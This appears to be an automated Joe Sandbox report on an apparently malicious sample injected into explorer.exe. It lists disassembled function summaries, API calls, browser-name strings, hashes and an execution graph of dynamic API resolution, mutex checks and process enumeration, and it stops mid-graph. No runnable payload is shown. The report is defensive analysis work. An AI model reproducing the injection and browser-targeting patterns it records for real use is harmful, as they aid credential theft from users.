                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _callnewh_errno$ExceptionThrowmalloc
                                                                                                                                                                  • String ID: rSingleObject
                                                                                                                                                                  • API String ID: 431260796-42315373
                                                                                                                                                                  • Opcode ID: b9ab288bb57c8fb22b4374bb0545ee38fb12452fb9c247dc91e5ab0c792df9f6
                                                                                                                                                                  • Instruction ID: f80aa94263451553fa08b352330b95d7d644aed83bd2a1966d5f6236f3c714d7
                                                                                                                                                                  • Opcode Fuzzy Hash: b9ab288bb57c8fb22b4374bb0545ee38fb12452fb9c247dc91e5ab0c792df9f6
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF0895AB05B4A51DE24D751F4C0795A364E785384F489421CE4E0F764EF7CC349CB01
                                                                                                                                                                  APIs
                                                                                                                                                                  • _callnewh.LIBCMT ref: 0983CD9E
                                                                                                                                                                  • malloc.LIBCMT ref: 0983CDAA
                                                                                                                                                                    • Part of subcall function 0983D70C: _FF_MSGBANNER.LIBCMT ref: 0983D73C
                                                                                                                                                                    • Part of subcall function 0983D70C: _NMSG_WRITE.LIBCMT ref: 0983D746
                                                                                                                                                                    • Part of subcall function 0983D70C: HeapAlloc.KERNEL32 ref: 0983D761
                                                                                                                                                                    • Part of subcall function 0983D70C: _callnewh.LIBCMT ref: 0983D77A
                                                                                                                                                                    • Part of subcall function 0983D70C: _errno.LIBCMT ref: 0983D785
                                                                                                                                                                    • Part of subcall function 0983D70C: _errno.LIBCMT ref: 0983D790
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0983CDF3
                                                                                                                                                                    • Part of subcall function 0983D7CC: RtlPcToFileHeader.NTDLL ref: 0983D85B
                                                                                                                                                                    • Part of subcall function 0983D7CC: RaiseException.KERNEL32 ref: 0983D89A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                  • String ID: bad allocation
                                                                                                                                                                  • API String ID: 1214304046-2104205924
                                                                                                                                                                  • Opcode ID: 25a09b959b445181ca9606f09c8f966ee2b22572cdda355b5cb88af33e88a94b
                                                                                                                                                                  • Instruction ID: d1966663bb3b478673f989d1a348ec499ac1bfc6ff8ee9303f4eb76281b6393e
                                                                                                                                                                  • Opcode Fuzzy Hash: 25a09b959b445181ca9606f09c8f966ee2b22572cdda355b5cb88af33e88a94b
                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0E265701B4E80DE20AB54A4007996750E795384F84D428EE8E8BB64EF3CC24ECB41
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 09828DB0: HeapCreate.KERNEL32 ref: 09828DCD
                                                                                                                                                                    • Part of subcall function 0983BDA0: lstrcpyA.KERNEL32 ref: 0983BDF4
                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0983A1F1
                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0983A1FE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalInitializeSection$CreateHeaplstrcpy
                                                                                                                                                                  • String ID: Chrome$Firefox
                                                                                                                                                                  • API String ID: 3526404123-2335468407
                                                                                                                                                                  • Opcode ID: 9d0fbc751aaf2160716b6f4dc0322b64a8c23c7c8581ce340a51a29f6b9d1384
                                                                                                                                                                  • Instruction ID: 15492295cc1bc7c1fe1e35d2df8be0b74a4a2b6a330484882bf2ae0cc3e5a377
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d0fbc751aaf2160716b6f4dc0322b64a8c23c7c8581ce340a51a29f6b9d1384
                                                                                                                                                                  • Instruction Fuzzy Hash: D9E00968A12F01DAFB00EBA9FC8439433A8B756705FC18125C44D4A372EF3C859AC795
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlenmallocmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1128592954-0
                                                                                                                                                                  • Opcode ID: 7e0912bcf351996b291bf4fb3f87cb9c28880ce2d9d20d15a7e9bb782bf88500
                                                                                                                                                                  • Instruction ID: d91a722312539cbd055f8d3e804656477d907fb3d7cee474e97d3526f185c02a
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e0912bcf351996b291bf4fb3f87cb9c28880ce2d9d20d15a7e9bb782bf88500
                                                                                                                                                                  • Instruction Fuzzy Hash: EB01862571679081DA549F17F94432AA791EB4DFC0F4C9034EE4F47B19EE2CD4818B44
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _errno$isxdigitstrtol
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1632192098-0
                                                                                                                                                                  • Opcode ID: 36a23a62e35a68befc3644e019d1d83519569c769ab166e668e410ab635532b5
                                                                                                                                                                  • Instruction ID: adf6e92bc2be73d54e43cadd77aafafe281d680f88a52f490ce96f3ae3a78d96
                                                                                                                                                                  • Opcode Fuzzy Hash: 36a23a62e35a68befc3644e019d1d83519569c769ab166e668e410ab635532b5
                                                                                                                                                                  • Instruction Fuzzy Hash: C3613A27304BA486EB218F35E85436A7B50F395B94F495119DF8A8B7A5DF3DC0C1C721
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1264244614-0
                                                                                                                                                                  • Opcode ID: fca3f0629636ecf2a2a28a1cd1d999478e7961aba545bddf249877430241f3f3
                                                                                                                                                                  • Instruction ID: 7e534c9874fbd949457ec32a3243ed1ea453b11e02c076557245566a483ce5c9
                                                                                                                                                                  • Opcode Fuzzy Hash: fca3f0629636ecf2a2a28a1cd1d999478e7961aba545bddf249877430241f3f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F119362214A8091CE24EB29E4503AE6371FB897D4FC4A629DAAD87798DF3CC645CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strncmp
                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                  • API String ID: 1114863663-2658103896
                                                                                                                                                                  • Opcode ID: c48887af418da941c8850194f4343dad7ba23ae3c88db934cbe84a9260ac729e
                                                                                                                                                                  • Instruction ID: 00f0c8905c4c938e757715c07c223be42738c8dedfaa173d140616980fc2075c
                                                                                                                                                                  • Opcode Fuzzy Hash: c48887af418da941c8850194f4343dad7ba23ae3c88db934cbe84a9260ac729e
                                                                                                                                                                  • Instruction Fuzzy Hash: AD014F6171599082EB90CF67F54071A6360FB85FC8F49901ADF5D8BB4DEF2AC591CB04
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: abort$_set_abort_behavior
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2064194629-0
                                                                                                                                                                  • Opcode ID: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                  • Instruction ID: e7daa9d984cd6561ce9bd87bece0c6ce60a4cf48894e8ea655c69876080fb63e
                                                                                                                                                                  • Opcode Fuzzy Hash: 4eee50fa0f7e27dce3ca1ba23277c15061aad6adf7266d05848666a1cff57a75
                                                                                                                                                                  • Instruction Fuzzy Hash: FDF0A028E11B09D5EE1AEBA0FDE432C2364FB8A740F889914954D4B724CE3CE391C300
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 03332A90: _RunAllParam.LIBCPMT ref: 03332AAC
                                                                                                                                                                  • _RunAllParam.LIBCPMT ref: 0332D263
                                                                                                                                                                  • _RunAllParam.LIBCPMT ref: 0332D276
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Param
                                                                                                                                                                  • String ID: and ).
                                                                                                                                                                  • API String ID: 1698386829-1089536224
                                                                                                                                                                  • Opcode ID: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
                                                                                                                                                                  • Instruction ID: fac5fb337e0abbde4657b75210f0f40b083908ca282710aea49837421b8e9db8
                                                                                                                                                                  • Opcode Fuzzy Hash: 184ffe6a515dd46526c9c3b3ab7d42159a35620b1830b27d2eb492d9c63b974d
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F03075B02B1585DF25EFA7D4E032A2325EB85FC4F189521CD0E4F314CD29C4839380
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::locale::_Locimp::_Locimp_dtor.LIBCPMT ref: 0333BDD9
                                                                                                                                                                    • Part of subcall function 0333BEF4: std::_Lockit::_Lockit.LIBCPMT ref: 0333BF12
                                                                                                                                                                    • Part of subcall function 0333BEF4: free.LIBCMT ref: 0333BF50
                                                                                                                                                                    • Part of subcall function 0333BEF4: std::_Lockit::~_Lockit.LIBCPMT ref: 0333BF5B
                                                                                                                                                                  • free.LIBCMT ref: 0333BDE7
                                                                                                                                                                    • Part of subcall function 0333CACC: _errno.LIBCMT ref: 0333CAEC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Lockitfreestd::_$Locimp::_Locimp_dtorLockit::_Lockit::~__errnostd::locale::_
                                                                                                                                                                  • String ID: ore
                                                                                                                                                                  • API String ID: 161006167-2619071404
                                                                                                                                                                  • Opcode ID: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
                                                                                                                                                                  • Instruction ID: 9dd1197f10e02dc9dbd4ac07e0d4b2fa93116eb22babee9d781139595f00e4fc
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f127ecb6d852186a7a4016091c7f99b380aeb7868c6ab7e7f9e58955c649337
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F03936A12B4194DF1ADF6AF8D0368B368AB89B94F6D9120DA0C4A324DE38C590C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0333B6CC
                                                                                                                                                                    • Part of subcall function 0333E028: std::exception::_Copy_str.LIBCMT ref: 0333E047
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0333B6ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                  • String ID: lp32Snapshot
                                                                                                                                                                  • API String ID: 1924332735-2612382832
                                                                                                                                                                  • Opcode ID: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
                                                                                                                                                                  • Instruction ID: 8997eb7253dc8453333ec2dc8d2b1ad45ea13e70821b2e1dffbf2f30b53f64c0
                                                                                                                                                                  • Opcode Fuzzy Hash: a723fdbf8b2a5431af685e8c51f8ba99275f1b1f5113f0538031b3811cd6a6f9
                                                                                                                                                                  • Instruction Fuzzy Hash: D8E09A66614B8A91DB20DB60F4C0749A7A4F799348F505515928D4AA28EA7CC349CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0333B68B
                                                                                                                                                                    • Part of subcall function 0333E028: std::exception::_Copy_str.LIBCMT ref: 0333E047
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0333B6A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                  • String ID: lstrcpyA
                                                                                                                                                                  • API String ID: 1924332735-2919489367
                                                                                                                                                                  • Opcode ID: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
                                                                                                                                                                  • Instruction ID: 19335c6cbf643d451d55efd394ad7192ddedcfe3f0a639a3851885e83a770a38
                                                                                                                                                                  • Opcode Fuzzy Hash: 75d6338df16f3fc7e94c6d15f4162d0a48cce31c61ba757d02e5b78a9ed6e38f
                                                                                                                                                                  • Instruction Fuzzy Hash: 74D04C66504B8A91DE25DB40E480399B365F795348F805611928C1BA28DBBCD719CB01
                                                                                                                                                                  APIs
                                                                                                                                                                  • std::exception::exception.LIBCMT ref: 0333B653
                                                                                                                                                                    • Part of subcall function 0333E028: std::exception::_Copy_str.LIBCMT ref: 0333E047
                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0333B670
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_3320000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Copy_strExceptionThrowstd::exception::_std::exception::exception
                                                                                                                                                                  • String ID: enProcess
                                                                                                                                                                  • API String ID: 1924332735-3780156600
                                                                                                                                                                  • Opcode ID: 835f7303bc4335b4334c273b3c7294a297f77a417c1691680fa63035e0e7157f
                                                                                                                                                                  • Instruction ID: 083a185add04304273ed6f720cc157532671a2fdb931b08d14f41d23c663a5b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 835f7303bc4335b4334c273b3c7294a297f77a417c1691680fa63035e0e7157f
                                                                                                                                                                  • Instruction Fuzzy Hash: 2CD06267544F8A91DE25DB40F4C0399B374F795348F80551192CC1BE28DBBCD319CB41
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_9820000_explorer.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3605230531-0
                                                                                                                                                                  • Opcode ID: 4b79464cb83e92cc1290e2fe8b6cc4568c70f35dff0e471b1119b8fe8653bd10
                                                                                                                                                                  • Instruction ID: cbf59801b030b61d7b7faf97e8a66c907751abb11af0f6ec345af54a3aaf886b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b79464cb83e92cc1290e2fe8b6cc4568c70f35dff0e471b1119b8fe8653bd10
                                                                                                                                                                  • Instruction Fuzzy Hash: 4621FB23A1AE84CAF719CF3AEC9439827A0F7B6B04F4D501AD6598F3A2DE25C045C748

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:40.3%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                  Total number of Nodes:483
                                                                                                                                                                  Total number of Limit Nodes:12
                                                                                                                                                                  execution_graph 893 7ff6743d345c 954 7ff6743d10a0 893->954 898 7ff6743d3474 ExitProcess 899 7ff6743d347c 1188 7ff6743d4264 GetCurrentProcess OpenProcessToken 899->1188 903 7ff6743d3497 904 7ff6743d34fb 903->904 905 7ff6743d34ac 903->905 910 7ff6743d3510 904->910 911 7ff6743d354c 904->911 906 7ff6743d43a4 3 API calls 905->906 907 7ff6743d34b8 906->907 908 7ff6743d34d2 ExitProcess 907->908 909 7ff6743d34bf 907->909 912 7ff6743d43a4 3 API calls 909->912 913 7ff6743d43a4 3 API calls 910->913 919 7ff6743d35a2 911->919 920 7ff6743d3561 911->920 915 7ff6743d34cb 912->915 914 7ff6743d351c 913->914 916 7ff6743d3523 ExitProcess 914->916 917 7ff6743d352b 914->917 915->908 918 7ff6743d34da 915->918 921 7ff6743d327c 20 API calls 917->921 1223 7ff6743d32ec 918->1223 1212 7ff6743d3a74 919->1212 1203 7ff6743d43a4 CreateMutexA 920->1203 925 7ff6743d3530 921->925 929 7ff6743d3544 ExitProcess 925->929 930 7ff6743d3537 Sleep 925->930 927 7ff6743d34df 932 7ff6743d34f3 ExitProcess 927->932 933 7ff6743d34e6 Sleep 927->933 930->925 933->927 934 7ff6743d3574 ExitProcess 935 7ff6743d357c 1207 7ff6743d327c 935->1207 938 7ff6743d3581 941 7ff6743d3595 ExitProcess 938->941 942 7ff6743d3588 Sleep 938->942 939 7ff6743d360e 7 API calls 940 7ff6743d35ba 943 7ff6743d43a4 3 API calls 940->943 942->938 944 7ff6743d35c6 943->944 945 7ff6743d35e0 ExitProcess 944->945 946 7ff6743d35cd 944->946 947 7ff6743d43a4 3 API calls 946->947 948 7ff6743d35d9 947->948 948->945 949 7ff6743d35e8 948->949 950 7ff6743d32ec 47 API calls 949->950 951 7ff6743d35ed 950->951 952 7ff6743d35f4 Sleep 951->952 953 7ff6743d3601 ExitProcess 951->953 952->951 1232 7ff6743d1000 LoadLibraryA GetProcAddress 954->1232 956 7ff6743d113a 1233 7ff6743d1000 LoadLibraryA GetProcAddress 956->1233 958 7ff6743d1154 1234 7ff6743d1050 LoadLibraryA GetProcAddress 958->1234 960 7ff6743d116e 1235 7ff6743d1050 LoadLibraryA GetProcAddress 960->1235 962 7ff6743d1188 1236 7ff6743d1050 LoadLibraryA GetProcAddress 962->1236 964 7ff6743d11a2 1237 7ff6743d1050 LoadLibraryA GetProcAddress 964->1237 966 7ff6743d11bc 1238 7ff6743d1050 LoadLibraryA GetProcAddress 966->1238 968 7ff6743d11d6 1239 7ff6743d1050 LoadLibraryA GetProcAddress 968->1239 970 7ff6743d11f0 1240 7ff6743d1050 LoadLibraryA GetProcAddress 970->1240 972 7ff6743d120a 1241 7ff6743d1050 LoadLibraryA GetProcAddress 972->1241 974 7ff6743d1224 1242 7ff6743d1050 LoadLibraryA GetProcAddress 974->1242 976 7ff6743d123e 1243 7ff6743d1000 LoadLibraryA GetProcAddress 976->1243 978 7ff6743d1258 1244 7ff6743d1000 LoadLibraryA GetProcAddress 978->1244 980 7ff6743d1272 1245 7ff6743d1000 LoadLibraryA GetProcAddress 980->1245 982 7ff6743d128c 1246 7ff6743d1000 LoadLibraryA GetProcAddress 982->1246 984 7ff6743d12a6 1247 7ff6743d1050 LoadLibraryA GetProcAddress 984->1247 986 7ff6743d12c0 1248 7ff6743d1050 LoadLibraryA GetProcAddress 986->1248 988 7ff6743d12da 1249 7ff6743d1050 LoadLibraryA GetProcAddress 988->1249 990 7ff6743d12f4 1250 7ff6743d1050 LoadLibraryA GetProcAddress 990->1250 992 7ff6743d130e 1251 7ff6743d1050 LoadLibraryA GetProcAddress 992->1251 994 7ff6743d1328 1252 7ff6743d1050 LoadLibraryA GetProcAddress 994->1252 996 7ff6743d1342 1253 7ff6743d1050 LoadLibraryA GetProcAddress 996->1253 998 7ff6743d135c 1254 7ff6743d1050 LoadLibraryA GetProcAddress 998->1254 1000 7ff6743d1376 1255 7ff6743d1050 LoadLibraryA GetProcAddress 1000->1255 1002 7ff6743d1390 1256 7ff6743d1050 LoadLibraryA GetProcAddress 1002->1256 1004 7ff6743d13aa 1257 7ff6743d1050 LoadLibraryA GetProcAddress 1004->1257 1006 7ff6743d13c4 1258 7ff6743d1050 LoadLibraryA GetProcAddress 1006->1258 1008 7ff6743d13de 1259 7ff6743d1050 LoadLibraryA GetProcAddress 1008->1259 1010 7ff6743d13f8 1260 7ff6743d1050 LoadLibraryA GetProcAddress 1010->1260 1012 7ff6743d1412 1261 7ff6743d1050 LoadLibraryA GetProcAddress 1012->1261 1014 7ff6743d142c 1262 7ff6743d1050 LoadLibraryA GetProcAddress 1014->1262 1016 7ff6743d1446 1263 7ff6743d1050 LoadLibraryA GetProcAddress 1016->1263 1018 7ff6743d1460 1264 7ff6743d1050 LoadLibraryA GetProcAddress 1018->1264 1020 7ff6743d147a 1265 7ff6743d1050 LoadLibraryA GetProcAddress 1020->1265 1022 7ff6743d1494 1266 7ff6743d1050 LoadLibraryA GetProcAddress 1022->1266 1024 7ff6743d14ae 1267 7ff6743d1050 LoadLibraryA GetProcAddress 1024->1267 1026 7ff6743d14c8 1268 7ff6743d1050 LoadLibraryA GetProcAddress 1026->1268 1028 7ff6743d14e2 1269 7ff6743d1050 LoadLibraryA GetProcAddress 1028->1269 1030 7ff6743d14fc 1270 7ff6743d1050 LoadLibraryA GetProcAddress 1030->1270 1032 7ff6743d1516 1271 7ff6743d1050 LoadLibraryA GetProcAddress 1032->1271 1034 7ff6743d1530 1272 7ff6743d1050 LoadLibraryA GetProcAddress 1034->1272 1036 7ff6743d154a 1273 7ff6743d1050 LoadLibraryA GetProcAddress 1036->1273 1038 7ff6743d1564 1274 7ff6743d1050 LoadLibraryA GetProcAddress 1038->1274 1040 7ff6743d157e 1275 7ff6743d1050 LoadLibraryA GetProcAddress 1040->1275 1042 7ff6743d1598 1276 7ff6743d1050 LoadLibraryA GetProcAddress 1042->1276 1044 7ff6743d15b2 1277 7ff6743d1050 LoadLibraryA GetProcAddress 1044->1277 1046 7ff6743d15cc 1278 7ff6743d1050 LoadLibraryA GetProcAddress 1046->1278 1048 7ff6743d15e6 1279 7ff6743d1050 LoadLibraryA GetProcAddress 1048->1279 1050 7ff6743d1600 1280 7ff6743d1050 LoadLibraryA GetProcAddress 1050->1280 1052 7ff6743d161a 1281 7ff6743d1050 LoadLibraryA GetProcAddress 1052->1281 1054 7ff6743d1634 1282 7ff6743d1050 LoadLibraryA GetProcAddress 1054->1282 1056 7ff6743d164e 1283 7ff6743d1050 LoadLibraryA GetProcAddress 1056->1283 1058 7ff6743d1668 1284 7ff6743d1050 LoadLibraryA GetProcAddress 1058->1284 1060 7ff6743d1682 1285 7ff6743d1050 LoadLibraryA GetProcAddress 1060->1285 1062 7ff6743d169c 1286 7ff6743d1050 LoadLibraryA GetProcAddress 1062->1286 1064 7ff6743d16b6 1287 7ff6743d1050 LoadLibraryA GetProcAddress 1064->1287 1066 7ff6743d16d0 1288 7ff6743d1050 LoadLibraryA GetProcAddress 1066->1288 1068 7ff6743d16ea 1289 7ff6743d1050 LoadLibraryA GetProcAddress 1068->1289 1070 7ff6743d1704 1290 7ff6743d1050 LoadLibraryA GetProcAddress 1070->1290 1072 7ff6743d171e 1291 7ff6743d1050 LoadLibraryA GetProcAddress 1072->1291 1074 7ff6743d1738 1292 7ff6743d1050 LoadLibraryA GetProcAddress 1074->1292 1076 7ff6743d1752 1293 7ff6743d1050 LoadLibraryA GetProcAddress 1076->1293 1078 7ff6743d176c 1294 7ff6743d1050 LoadLibraryA GetProcAddress 1078->1294 1080 7ff6743d1786 1295 7ff6743d1050 LoadLibraryA GetProcAddress 1080->1295 1082 7ff6743d17a0 1296 7ff6743d1050 LoadLibraryA GetProcAddress 1082->1296 1084 7ff6743d17ba 1297 7ff6743d1050 LoadLibraryA GetProcAddress 1084->1297 1086 7ff6743d17d4 1298 7ff6743d1050 LoadLibraryA GetProcAddress 1086->1298 1088 7ff6743d17ee 1299 7ff6743d1050 LoadLibraryA GetProcAddress 1088->1299 1090 7ff6743d1808 1300 7ff6743d1050 LoadLibraryA GetProcAddress 1090->1300 1092 7ff6743d1822 1301 7ff6743d1050 LoadLibraryA GetProcAddress 1092->1301 1094 7ff6743d183c 1302 7ff6743d1050 LoadLibraryA GetProcAddress 1094->1302 1096 7ff6743d1856 1303 7ff6743d1050 LoadLibraryA GetProcAddress 1096->1303 1098 7ff6743d1870 1304 7ff6743d1050 LoadLibraryA GetProcAddress 1098->1304 1100 7ff6743d188a 1305 7ff6743d1050 LoadLibraryA GetProcAddress 1100->1305 1102 7ff6743d18a4 1306 7ff6743d1050 LoadLibraryA GetProcAddress 1102->1306 1104 7ff6743d18be 1307 7ff6743d1050 LoadLibraryA GetProcAddress 1104->1307 1106 7ff6743d18d8 1308 7ff6743d1050 LoadLibraryA GetProcAddress 1106->1308 1108 7ff6743d18f2 1309 7ff6743d1050 LoadLibraryA GetProcAddress 1108->1309 1110 7ff6743d190c 1310 7ff6743d1050 LoadLibraryA GetProcAddress 1110->1310 1112 7ff6743d1926 1311 7ff6743d1050 LoadLibraryA GetProcAddress 1112->1311 1114 7ff6743d1940 1312 7ff6743d1050 LoadLibraryA GetProcAddress 1114->1312 1116 7ff6743d195a 1313 7ff6743d1050 LoadLibraryA GetProcAddress 1116->1313 1118 7ff6743d1974 1314 7ff6743d1050 LoadLibraryA GetProcAddress 1118->1314 1120 7ff6743d198e 1315 7ff6743d1050 LoadLibraryA GetProcAddress 1120->1315 1122 7ff6743d19a8 1316 7ff6743d1050 LoadLibraryA GetProcAddress 1122->1316 1124 7ff6743d19c2 1317 7ff6743d1050 LoadLibraryA GetProcAddress 1124->1317 1126 7ff6743d19dc 1318 7ff6743d1050 LoadLibraryA GetProcAddress 1126->1318 1128 7ff6743d19f6 1319 7ff6743d1050 LoadLibraryA GetProcAddress 1128->1319 1130 7ff6743d1a10 1320 7ff6743d1050 LoadLibraryA GetProcAddress 1130->1320 1132 7ff6743d1a2a 1321 7ff6743d1050 LoadLibraryA GetProcAddress 1132->1321 1134 7ff6743d1a44 1322 7ff6743d1050 LoadLibraryA GetProcAddress 1134->1322 1136 7ff6743d1a5e 1323 7ff6743d1050 LoadLibraryA GetProcAddress 1136->1323 1138 7ff6743d1a78 1324 7ff6743d1050 LoadLibraryA GetProcAddress 1138->1324 1140 7ff6743d1a92 1325 7ff6743d1050 LoadLibraryA GetProcAddress 1140->1325 1142 7ff6743d1aac 1326 7ff6743d1050 LoadLibraryA GetProcAddress 1142->1326 1144 7ff6743d1ac6 1327 7ff6743d1050 LoadLibraryA GetProcAddress 1144->1327 1146 7ff6743d1ae0 1328 7ff6743d1050 LoadLibraryA GetProcAddress 1146->1328 1148 7ff6743d1afa 1329 7ff6743d1050 LoadLibraryA GetProcAddress 1148->1329 1150 7ff6743d1b14 1330 